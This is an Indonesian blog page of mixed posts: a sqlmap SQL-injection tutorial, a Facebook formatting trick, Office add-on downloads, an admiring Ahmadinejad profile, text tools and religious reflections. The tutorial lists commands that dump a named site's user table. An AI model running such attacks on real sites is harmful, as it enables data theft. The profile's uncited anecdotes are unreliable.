-->

K.E ^_~ Yang lagi galau ini penawarnya link

8 Cara menggunakan sqlmap pada backtrack 5

dear all..:)

Akhirny kesampaian juga nulis artikel disini lagi :)
okok langsung aja kali ini gw mau sharing tentang cara penggunaan sqlmap. Sqlmap adalah salah satu tools pentest di linux backtrack yang kegunaanny untuk mengexploitasi web yang vulnerable terhadap serangan sql injection..:).

Buat maniak ubuntu juga bisa kok (tinggal download aja toolsnya). Oke langsung aja setelah lo dah dapet target yang vuln sql injection, ikuti langkah-langkah berikut:

1.buka sqlmap kalian

Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.setelah terbuka tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 --dbs




-u       = url
--dbs  = kita mencari nama databasenya...

3. Setelah ketemu nama databasenya yaitu="uselessj_uj2006"
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 --tables

-D            = nama database yang sudah kita temukan tadi
--tables     = untuk mencari nama table..

4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut...:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --columns


lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --dump

fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)

oke kalo udah gini terserah kalian mau diapakan..ane gak tanggung jawab yee..sekedar sharing aja buat pembelajaran :P

regard

CitooZz Banditozz

99 Cara baru membuat status biru di facebook

Membuat status biru dengan cara sebelumnya sudah tidak bisa, sepertinya pihak facebook memang tidak menghendaki usernya untuk update status yang berbau link seperti itu. Tetapi yang namanya manusia, semakin dilarang, semakin penasaran. Hasil rasa penasaran ini adalah munculnya cara baru membuat status biru di facebook. Bukan hanya status yang bisa berwarna biru tapi komentarpun bisa menjadi biru dengan cara ini.

Pada awalnya saya penasaran melihat komentar seorang teman berwarna biru di facebook. Dalam hati "emang membuat komentar biru di facebook masih bisa ya?". Bukankah udah dipatch oleh pihak facebook?. hmmm sepertinya ada cara lain nih.

Ok kita langsung pada triknya, anda cukup copas kode seperti di bawah:

‎@@[0:[136044869785541:1:Tulis status biru anda di sini]]

Kemudian masukkan kode tersebut pada kotak update status atau kotak komentar. Sesuaikan tulisan yang berwarna biru dengan status atau komentar anda. Coba liat hasilnya.

Notes: Cara seperti ini masih bisa digunakan saat tulisan ini dibuat, namun kemungkinan sudah tidak bisa digunakan saat anda baca tulisan ini.

Update !!
Update status maupun komentar dengan rumus di atas sudah tidak bisa, akan tetapi kalau kode aplikasinya kita arahkan ke profile sendiri ternyata masih bisa. trus gimana rumusnya? coba rumus ini
@@[0:[0:1:status biru facebook]]
Sekian, semoga bermanfaat :)

8 Menambahkan fitur tab pada microsoft office 2003, 2007 dan 2010

Office Tab atau Tab Office adalah sebuah addons untuk Microsoft Office 2003 atau Microsoft Office 2007 atau Microsoft Office 2010 (32bit dan 64-bit). Program ini berguna untuk membuat tab layaknya tab pada firefox. Dengan model tab ini, Anda dapat beralih ke dokumen yang berbeda dengan cepat, mudah dan efisien.

Bagi anda yang sering bekerja dengan office (word, excel, power point etc) mungkin akan kewalahan saat anda membuka beberapa dokumen sekaligus. Taskbar window anda akan terlihat acak acakan dan tentunya sangat mengganggu kenyamanan anda.

Di sinilah tab office berperan merapikan dokumen office anda yang sedang terbuka. Jika anda terbiasa menggunakan browser mozilla firefox, saya yakin anda sudah tidak asing dengan fitur tab ini. coba lihat gambar berikut.


Yang diberi lingkaran merah itu yang dinamakan tab. Secara default microsoft office belum menyertakan fitur tab ini. Sehingga saat kita membuka dokumen lebih dari satu, akan memakan space pada taskbar.

Office tab merupakan program buatan china dan bagusnya lagi program ini bersifat freeware alias gratis dan anda bebas memakainya.

Sebenarnya tab office ini memiliki banyak fungsi lain disamping fungsi utamanya membuat tab. Salah satunya adalah membuat fitur favorit grup. Dengan fitur ini anda dapat mengelompokkan sejumlah dokumen favorit, membuat kelompok kelompok dokumen dan dapat menempatkan kelompok dokumen ini dalam tab yang mudah untuk akses. Intinya adalah mempermudah kerja anda dengan office. Untuk mengetahui fitur lengkapnya silahkan anda baca pada situs resminya di sini.

Jika anda mau mencobanya, silahkan download filenya di bawah:

Nama File:                     SetupOfficeTab.exe(Untuk Office 32-bit) 
File Size:                        2,919,048  bytes
Download File:              Click to download

Nama File:                     SetupOfficeTabx64.exe(for Office 64-bit) 
File Size:                        2,604,936  bytes
Download File:              Click to download

Nama File:                    SetupOfficeTabEnterprise.exe(for Office 32-bit) 
File Size:                       4,047,672 bytes
Download File:             Click to download

Nama File:                    SetupOfficeTabEnterprisex64.exe(for Office 64-bit) 
File Size:                       6,092,192 bytes
Download File:             Click to download



204 Inilah presiden termiskin di dunia yang patut kita teladani

Profil singkat Mahmoud Ahmadinejad

Nama : Mahmoud Ahmadinejad
Tempat / Tanggal lahir : Aradan, Iran / 28 Oktober 1956
Status : Menikah
Menjabat sebagai Presiden Iran ke : 6
Pendidikan  : Gelar Doktor dalam bidang teknik dan perencanaan lalu lintas dan transportasi Universitas Sains dan Teknologi Iran (IUST)




Mahmoud Ahmadinejad terlahir dengan nama Mahmoud Sabourijan di daerah Garmsar, tepatnya desa Aradan 54 tahun silam. Ayahnya, Ahmad, adalah seorang pandai besi dan pengikut ajaran Syi’ah yang taat. Ibunya, Khanom, dikatakan memiliki hubungan darah dengan nabi Muhammad SAW.

Ahmadinejad merupakan seseorang yang tidak terkenal, bukan tokoh ulama, juga bukan tokoh politik di negara Iran. Ahmadinejad kecil tumbuh layaknya seorang remaja di usianya. Dikenal sebagai penggemar sepakbola dan jago bermain sepakbola. Dia juga pintar matematika. Selain itu Ahmadinejad terkenal memiliki suara yang bagus, seperti saat membaca Al-Quran maupun pidato.

Keluarga Ahmadinejad pindah ke Teheran, Iran pada saat dia berusia 1 tahun. Nama ‘Sabourijan’ diganti menjadi ‘Ahmadinejad’ oleh sang ayah untuk menghindari konflik di tempat tinggal barunya.

Pada tahun 1980, Ahmadinejad merupakan ketua perwakilan IUST (Iran University of Science and Technology) untuk perkumpulan mahasiswa se-Iran. Ahmadinejad juga terlibat dalam pendirian Kantor untuk Pereratan Persatuan (daftar-e tahkim-e vahdat), organisasi mahasiswa yang berada di balik perebutan Kedubes Amerika Serikat yang mengakibatkan terjadinya peristiwa ‘krisis sandera Iran’.

Pada masa perang saudara antara Iran dan Irak, Ahmadinejad bergabung dengan Korps Pengawal Revolusi Islam, tepatnya pada tahun 1986. Ahmadinejad kemudian diangkat menjadi insinyur kepala pasukan keenam Korps dan kepala staf Korps di sebelah barat Iran.

Setelah perang, dia bertugas sebagai wakil gubernur dan gubernur Maku dan Khoy, Penasehat Menteri Kebudayaan dan Ajaran Islam, dan gubernur provinsi Ardabil dari 1993 hingga Oktober 1997. Ini merupakan awal kiprah Ahmadinejad di dunia politik.

Pada bulan mei 2003, Ahmadinejad terpilih sebagai walikota Teheran. Selama menjabat sebagai walikota, Ahmadinejad menanamkan nilai-nilai keagamaan dalam kegiatan-kegiatan di pusat kebudayaan Teheran. Hal ini bertentangan dengan para walikota sebelum dirinya yang lebih modern dan reformis.

Saat kampanye, Ahmadinejad pernah bertengkar dengan Presiden Iran saat itu, Mohammad Khatami, yang membuat beliau mencabut hak Ahmadinejad untuk menghadiri pertemuan dewan menteri, hak yang biasanya diberikan pada walikota di Iran. Pertengkaran tersebut dipicu dari pernyataan Ahmadinejad di depan umum bahwa Presiden Khatami tidak pernah memperhatikan masalah sehari-hari warga Iran.

Pada tahun 2005, Ahmadinejad akhirnya terpilih menjadi Presiden keenam Iran setelah memenangkan 62 persen suara dalam Pemil. Mengalahkan rivalnya, Ahmad Hashemi Rafsanjani.

Tidak ada yang mengira Mahmoud Ahmadinejad dapat terpilih menjadi Presiden Iran, karena 6 kandidat presiden lainnya merupakan tokoh ulama atau tokoh politik yang memiliki sumber dana besar. Ahmadinejad terpilih karena rakyat menyukai gaya dan sifatnya yang sederhana.

Tak lama setelah terpilih, Ahmadinejad tersandung tuduhan bahwa dirinya terlibnat dalam peristiwa ‘krisis sandera Iran’ pada tahun 1979. Sebuah foto yang diklaim sebagai bukti memperlihatkan seorang pria mirip dirinya sedang berjalan menuntutn sandera. namun hal ini tak pernah dapat dibuktikan.

Ahmadinejad dikenal sebagai sosok konservatif yang sangat berpedoman pada nilai-nilai agama yang dianutnya. Pidato dan kata-katanya seringkali pedas dan kontroversial. Terutama jika menyangkut negara Amerika. Perkataan Ahmadinejad ini membuat dirinya tak disukai oleh kalangan politikus dunia Barat, terutama Amerika. Ahmadinejad juga dikenal sebagai tokoh anti-gay.

Saat menjabat Walikota Teheran, kemana-mana selalu menyetir sendiri, tetap tinggal di rumah susunnya, membersihkan lingkungannya sendiri, suka mengamati sendiri setiap sudut kota dan lain-lain.

Sifatnya yang sederhana ini masih terlihat saat Ahmadinejad terpilih menjadi Presiden. Karpet-karpet merah persia mahal dikeluarkan semua dari istana, menolak mobil limosine dan tetap setia menggunakan mobil tuanya serta tetap tinggal di rumah susunnya. Selain sifatnya yang sederhana ia dicintai karena lebih mementingkan memperbaiki ekonomi negara ketimbang bidang-bidang lain dan memperjuangkan setiap pendapatan minyak bumi agar jatuh ke meja makan rakyat Iran.
Saya tidak akan berhenti hingga semua rakyat biasa di Iran dapat makan. (Ahmadinejad)
Dalam menghadapi tekanan barat pun Ahmadinejad berani dan tegas.
Anda yang menciptakan dan menggunakan senjata biologis saat perang Irak-Iran. Anda yang menggunakan peluru ber-uranium. Apa hak Anda melarang kami (Iran) mengembangkan teknologi nuklir untuk energi dan perdamaian. (Ahmadinejad)
Suatu ketika Ahmadinejad mendapat pertanyaan dari wartawan Jepang : “Tuan Presiden, kenapa Anda masih mempertahankan pengembangan teknologi nuklir yang mengancam perdamaian dunia ?”

``Anda seharusnya tidak perlu mengkhawatirkan kami (Iran), Anda harusnya lebih khawatir kepada negara yang pernah menjatuhkan bom nuklir ke negara Anda, jawab Ahmadinejad”

Kesederhanaan, pengabdian tulus pada negara dan keberanian dalam menghadapi tekanan barat membuat Mahmoud Ahmadinejad makin dicintai rakyatnya.

Presiden Iran saat ini: Mahmoud Ahmadinejad, ketika di wawancara oleh TV Fox (AS) soal kehidupan pribadinya:

"Saat anda melihat di cermin setiap pagi, apa yang anda katakan pada diri anda?"

Jawabnya: "Saya melihat orang di cermin itu dan mengatakan padanya: "Ingat, kau tak lebih dari seorang pelayan, hari di depanmu penuh dengan tanggung jawab yang berat, yaitu melayani bangsa Iran ."

Berikut adalah gambaran Ahmadinejad, yang membuat orang ternganga dan terheran-heran : 

1. Saat pertama kali menduduki kantor kepresidenan Ia menyumbangkan seluruh karpet Istana Iran yang sangat tinggi nilainya itu kepada masjid2 di Teheran dan menggantikannya dengan karpet biasa yang mudah dibersihkan.

2. Ia mengamati bahwa ada ruangan yang sangat besar untuk menerima dan menghormati tamu VIP, lalu ia memerintahkan untuk menutup ruang tersebut dan menanyakan pada protokoler untuk menggantinya dengan ruangan biasa dengan 2 kursi kayu, meski sederhana tetap terlihat impresive.

3. Di banyak kesempatan ia bercengkerama dengan petugas kebersihan di sekitar rumah dan kantor kepresidenannya.

4. Di bawah kepemimpinannya, saat ia meminta menteri2 nya untuk datang kepadanya dan menteri2 tsb akan menerima sebuah dokumen yang ditandatangani yang berisikan arahan2 darinya. Arahan tersebut terutama sekali menekankan para menteri2nya untuk tetap hidup sederhana dan disebutkan bahwa rekening pribadi maupun kerabat dekatnya akan diawasi, sehingga pada saat menteri2 tsb berakhir masa jabatannya dapat meninggalkan kantornya dengan kepala tegak.

5. Langkah pertamanya adalah ia mengumumkan kekayaan dan propertinya yang terdiri dari Peugeot 504 tahun 1977, sebuah rumah sederhana warisan ayahnya 40 tahun yang lalu di sebuah daerah kumuh di Teheran. Rekening banknya bersaldo minimum, dan satu2nya uang masuk adalah uang gaji bulanannya.

6. Gajinya sebagai dosen di sebuah universitas hanya senilai US$ 250.

7. Sebagai tambahan informasi, Presiden masih tinggal di rumahnya. Hanya itulah yang dimilikinyaseorang presiden dari negara yang penting baik secara strategis, ekonomis, politis, belum lagi secara minyak dan pertahanan. Bahkan ia tidak mengambil gajinya, alasannya adalah bahwa semua kesejahteraan adalah milik negara dan ia bertugas untuk menjaganya.

8. Satu hal yang membuat kagum staf kepresidenan adalah tas yg selalu dibawa sang presiden tiap hari selalu berisikan sarapan roti isi atau roti keju yang disiapkan istrinya dan memakannya dengan gembira, ia juga menghentikan kebiasaan menyediakan makanan yang dikhususkan untuk presiden.

9. Hal lain yang ia ubah adalah kebijakan Pesawat Terbang Kepresidenan, ia mengubahnya menjadi pesawat kargo sehingga dapat menghemat pajak masyarakat dan untuk dirinya, ia meminta terbang dengan pesawat terbang biasa dengan kelas ekonomi.

10. Ia kerap mengadakan rapat dengan menteri2 nya untuk mendapatkan info tentang kegiatan dan efisiensi yang sdh dilakukan, dan ia memotong protokoler istana sehingga menteri2 nya dapat masuk langsung ke ruangannya tanpa ada hambatan. Ia juga menghentikan kebiasaan upacara2 seperti karpet merah, sesi foto, atau publikasi pribadi, atau hal2 spt itu saat mengunjungi berbagai tempat di negaranya.

11. Saat harus menginap di hotel, ia meminta diberikan kamar tanpa tempat tidur yg tidak terlalu besar karena ia tidak suka tidur di atas kasur, tetapi lebih suka tidur di lantai beralaskan karpet dan selimut. Apakah perilaku tersebut merendahkan posisi presiden? Presiden Iran tidur di ruang tamu rumahnya sesudah lepas dari pengawal2nya yg selalu mengikuti kemanapun ia pergi. Menurut koran Wifaq, foto2 yg diambil oleh adiknya tersebut, kemudian dipublikasikan oleh media masa di seluruh dunia, termasuk amerika.

12. Sepanjang sholat, ia tidak duduk di baris paling muka

13. Bahkan ketika suara azan berkumandang, ia langsung mengerjakan sholat dimanapun ia berada meskipun hanya beralaskan karpet biasa 14. baru-baru ini dia baru saja mempunyai Hajatan Besar Yaitu Menikahkan Puteranya. Tapi pernikahan putra Presiden ini hanya layaknya pernikahan kaum Buruh. Semoga di negeri ini akan (terlahir) dan semakin banyak terlahir para pemimpin yang sangat mencintai dan dicintai seluruh rakyatnya... pemimpin yg amanah, sederhana, tulus mengabdi kepada rakyat, tidak menyakiti hati rakyat, selalu peduli, mengutamakan dan memperjuangkan kepentingan rakyatnya melebihi kepentingan dirinya, keluarganya, golongan dan kelompoknya, amiiiin...

Berikut foto foto yang menggambarkan kesederhanaan sang presiden:

Foto Presiden Iran:
sangat menghormati wanita
Pernikahan sederhana untuk anaknya
Acara pernikahan anak ahmadinejad
Shalat dimanapun ia berada
Shalat berjamaah
Meja makan Presiden Ahmadinejad
Kamar tidur Presiden
Ruang Kerja
Jamuan Makan kepada Presiden Morales
Tanpa protokoler kepresidenan yang sangat ketat
Penulis: Wahyu Setyo Wibowo

23 [Tools] Menambah efek arsiran pada teks

Satu lagi tools untuk manipulasi teks agar terlihat indah, unik dan tentunya beda dari biasanya. Saya sendiri bingung mau memberi nama apa pada tools ini. Orang-orang sih menyebutnya C̷r̷o̷s̷s̷ ̷H̷a̷t̷c̷h̷i̷n̷g̷ ̷T̷e̷x̷t̷, tapi saya lebih suka menyebutnya teks dengan efek arsiran. whatever lah, anda bisa memberi nama sesuka hati anda. Sebelumnya saya sudah mempublikasikan 2 tools untuk manipulasi teks yaitu Membuat tulisan terbalik dan alay teks generator yang merupakan tools untuk mengubah kalimat biasa menjadi kalimat alay gaya ABG :D Sekarang kita coba dengan tools yang saya jelaskan di atas:

C̷r̷o̷s̷s̷ ̷H̷a̷t̷c̷h̷i̷n̷g̷ ̷T̷e̷x̷t̷






Tools keren lain:
  1. Chat facebook dengan huruf berwarna
  2. Alay Teks Generator
  3. Tulisan terbalik
  4. SMS Gratis

19 [tools] Alay teks generator

Tiap zaman memiliki ciri khasnya sendiri sendiri, jika anak muda zaman dahulu khas dengan celana cutbray dan potongan rambut culunnya maka anak muda (baca: ABG) sekarang khas dengan bahasa Al4y-nya. Gak percaya?? coba deh baca status facebook anak anak SMP, SMA bahkan mahasiswa dan orang yang udah nenek nenek pun banyak yang menggunakan bahasa alay yang nyebelin ini..wkwkwk surim dah dunia.

Nah jika anda juga pengen bergaya ala ABG alay, saya ada tools yang dapat mengubah kalimat biasa menjadi kalimat alay. Nama toolsnya alay generator..ha ha .. :)) =)) silahkan dicoba:






Tulis teks yang akan dibuat menjadi Alay di bawah ini :


Teks Normal    Teks ALAY
  
HuRUf bEsAr keCil      
P4k3 4n9k4 D0n9      
Disngkt-sngkt biar pndk      
     
 Tools keren lain:
  1. Chat facebook dengan huruf warna
  2. Alay Teks Generator
  3. Tulisan terbalik
  4. SMS Gratis

thanks to: alaygenerator.co.cc

1 Kenapa Kita harus Takut ?!

kenapa kita meski takut pada masa depan yang sudah "pasti"... smua jatah kita sudah tertulis di lauful mahfudz, tidak ada yang akan tertukar atau salah, jadi tidak ada yang perlu kita takutkan tentang masa depan kita.

Kita siapkan dan jalani saja sunatullah (hukum sebab akibat) nya dengan sebaik-baiknya, karena takdir Allah tidak akan menyalahi sunatullah, semua berjalan diatas sunatullah NYA.

Menikmati tiap kejadian dengan rasa bahagia, senang, baik sangka, optimis, kreatif, dan lain-lain. Buanglah segala ketakutan, minder, rasa tidak PD dan atau apapun yang buruk yang bersarang di fikiran dan perasaan kita tentang masa depan karena itu hanya lah kotoran dan sampah yang akan menghambat dan memperberat langkah kita.

Tiap diri manusia sudah di desain oleh Allah sesuai ujian dan rintangan yang akan ia hadapi di dunia ini, jadi kemampuan kita jauh diatas smua ujian, cobaan, rintangan atau apapun yg kita menganggapnya sebagai hambatan.

Kita hanya butuh keyakinan dan kreativitas yang terus terjaga agar smua ujian dapat di hadapi dengan sikap terbaik kita. Insya Allah semua di dunia ini tidak ada yang terlalu sulit, karena desain kemampuan kita diatas semua takdir yang akan kita hadapi, semua tergantung pada keyakinan dan kreativitas kita untuk mengolah semua ujian, rintangan, tantangan tersebut.

Apalagi Allah selalu bersama kita, semakin ringan dan mudah saja hidup kita, di manja dengan segala pertolongan dari sang penolong yg serba Maha...semua kembali pada diri kita...

Sebuah renungan yang saya ambil dari catatan sahabat sekaligus seorang kakak yang saya hormati Wahyu Setyo Wibowo

30 [tools] Membuat tulisan terbalik

˙uıɐl lɐısos uɐƃuıɹɐɾ nɐʇɐ ǝɔɐdsʎɯ 'ɹǝʇʇıʍʇ 'ʞooqǝɔɐɟ snʇɐʇs ıp ɐʎɐƃɹǝq ɹɐpǝʞǝs nɐʇɐ 'ƃolq\qǝʍ uɐɯɐlɐɥ ɥɐpuıɹǝdɯǝɯ ʞnʇun ɐʎuuɐʞɐunƃƃuǝɯ ʇɐdɐp ɐpuɐ ˙ʞılɐqɹǝʇ uɐsılnʇ uɐʞlısɐɥƃuǝɯ ʞnʇun uɐʞɐunƃıp ıuı ɐuɐɥɹǝpǝs slooʇ

Pusing juga yah baca tulisan di atas. Coba baca dari bawah, meskipun masih agak kesulitan saya yakin sekarang anda bisa membacanya. Kurang lebih bunyinya seperti ini:
"Tools sederhana ini digunakan untuk menghasilkan tulisan terbalik. Anda dapat menggunakannya untuk memperindah halaman web/blog, atau sekedar bergaya di status facebook, twitter, myspace atau jaringan sosial lain."
Dalam novel "the da vinci code", tulisan terbalik seperti ini dijadikan sebuah teka teki sebagai petunjuk tempat harta karun. Sedangkan dalam jejaring sosial seperti facebook, twitter etc tulisan kayak gini dapat dimanfaatkan untuk menambah kebingungan orang yang membaca status kita, ha ha.

Trus bagaimana membuatnya? sepertinya butuh waktu dan kesabaran jika kita ingin membuat tulisan terbalik secara manual.

Sesuai bunyi tulisan terbalik di atas, di bawah ini ada sebuah tools sederhana yang dapat merubah tulisan biasa menjadi tulisan terbalik. silahkan dicoba.

Membuat Tulisan Terbalik


Tulisan Asli:

Tulisan Terbalik:
Powered by Finderonly

Tools keren lain:
  1. Chat facebook dengan huruf warna
  2. Alay Teks Generator
  3. Tulisan terbalik
  4. SMS Gratis
  5. Mengarsir teks

4 TTS Online Klikedukasi pindah tempat

Dua TTS versi awal bisa dimainkan di facebook dan di sini, sedangkan sisanya dan pengembangan selanjutnya sengaja saya pindahkan ke blog khusus yaitu di tts-online.blogspot.com Alasannya biar lebih tertata, lebih fokus dan lebih enak pas maeninnya tidak terganggu dengan tulisan tulisan gak jelas kayak gini..ha ha. :p

TTS Online klikedukasi atau biasa saya singkat TTSOKE, sampai tulisan ini dibuat sudah sampai versi ke 7. Pada versi awal tampilannya masih acak acakan, maksudnya bentuk persilangan katanya asal asalan alias tidak simetris. Mulai versi ketiga dan seterusnya saya mencoba desain tts yang lebih elegen dan rapi, meskipun sambil nyontek nyontek dikit he he..

Untuk versi ke enam dan ke tujuh selain bisa dimainkan secara online, juga tersedia ttsoke versi pdf dan bisa anda download untuk dikerjakan secara offline. So bagi yang masih kesulitan untuk membuka ttsoke versi online, anda bisa mencicipi tts versi pdfnya. ho ho ho

Untuk mencoba ttsoke langsung aja meluncur kesitu http://tts-online.blogspot.com

-- Semoga terhibur :) --

1 Sosok kesederhanaan sang raja

Pemimpin agung ini tampil dengan kesederhanaannya. Beliau menghentikan untanya. Seluruh perhatian, pandangan mata, simakan telinga, semuanya terpusat kepada sosoknya. Ia adalah raja.

Allah telah berkenan menaruh di depannya kunci perbendaharaan dunia. Tetapi beliau lebih memilih cara hidup yang sama sekali berbeda dengan kelaziman para raja dan penguasa yang pernah ada sebelumnya.

Tempat tinggalnya bukan istana melainkan Rumah Sangat Sederhana. Kepalanya tidak bermahkota. Pundak dan dadanya tidak bersematkan tanda pangkat dan lambang kebesaran dunia.

Bahkan meskipun sangat mampu, beliau tidak pernah memakai kain sutera. Tidak pernah tidur di atas kasur yang empuk, karena lebih memilih tikar ilalang sebagai alas.

Beliau adalah seorang sosok manusia yang malam-malam harinya diisi dengan dzikir dan tafakkur. Berdzikir, mengingat Allah dan bertafakkur, merenungkan ayat-ayat Ilahi baik yang tersurat maupun yang tersirat.

Beliau adalah seorang ummi alias tidak mengenal aksara namun segenap penghuni bumi ini telah diajarinya. Beliau adalah seorang sosok manusia yang siang harinya disarati dengan pergulatan kehidupan ummat yang dipimpinnya.

Beliau seorang sosok manusia yang mempunyai kekuatan dan pengaruh, baik terhadap orang awam maupun cerdik pandai. Wajahnya menyiratkan sikap lemah lembut, ksataria sekaligus cerdas. Sehingga siapa pun yang berhubungan dengan beliau, menaruh hormat dan cinta.

Ditengoknya orang sakit tanpa pandang kelas sosial. Diterimanya undangan seorang budak yang mengundangnya makan di gubuknya. Dijahitnya sendiri pakaiannya yang koyak. Yang tidak pernah berpaling sebelum orang lain berpaling. Yang tangannya senang memberi. Dan lidahnya sangat terpercaya.

Beliau adalah sosok manusia yang sangat sayang pada anak-anak. Yang perkataannya tidak pernah melukai orang lain. Yang diutus untuk menjadi rahmat.

Beliau adalah seorang yang berwajah tampan, berjanggut bersih. Rambutnya yang ikal panjang tersisir rapi di bawah sorban putih. Raut muka bercahaya, sorot mata tajam tapi teduh. Badannya pun kekar, berdada bidang, berkulit putih kemerah-merahan. Kala itu usia baru saja melewati enam puluhan.

Siapakah seorang sosok manusia yang luar biasa itu? Siapa lagi kalau bukan seorang sosok manusia tercinta, panutan umat, yaitu Muhammad Rasulullah SAW, tokoh teladan hidup.

Sesungguhnya telah ada bagi kamu sekalian pada diri Rasulullah itu Uswatun Hasanah (teladan hidup yang baik) bagi siapa saja yang mengharapkan keridlaan Allah.

Dikutip dari:
http://oase.kompas.com/read/2011/11/05/21275972/Spirit.dari.Peristiwa.Haji.Wada

Gambaran sosok sang teladan di atas merupakan peristiwa yang terjadi ketika Rasulullah SAW hendak menunaikan ibadah haji wada, yang merupakan ibadah haji perpisahan sebelum beliau wafat.

Kesederhanaan Rasulullah SAW tersebut, sepertinya tidak pernah kita jumpai pada masa sekarang ini. Dimana para pemimpin sibuk memperbesar perutnya sendiri dan memperindah pakaiannya tanpa mempedulikan rakyatnya kelaparan. Tidak selesai sampai disitu, bahkan pemimpin sekarang tak segan segan merampas hak rakyat miskin demi memenuhi ambisinya. Semoga Allah mengetuk hati pemimpin kita ini.

Hari raya qurban merupakan cara Allah mengingatkan manusia tentang pentingnya kepedulian pada sesama, berbagi itu indah, berbagi itu berkah.
Selamat hari raya Idul Adha (10 Dzul-Hijjah 1432)
 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x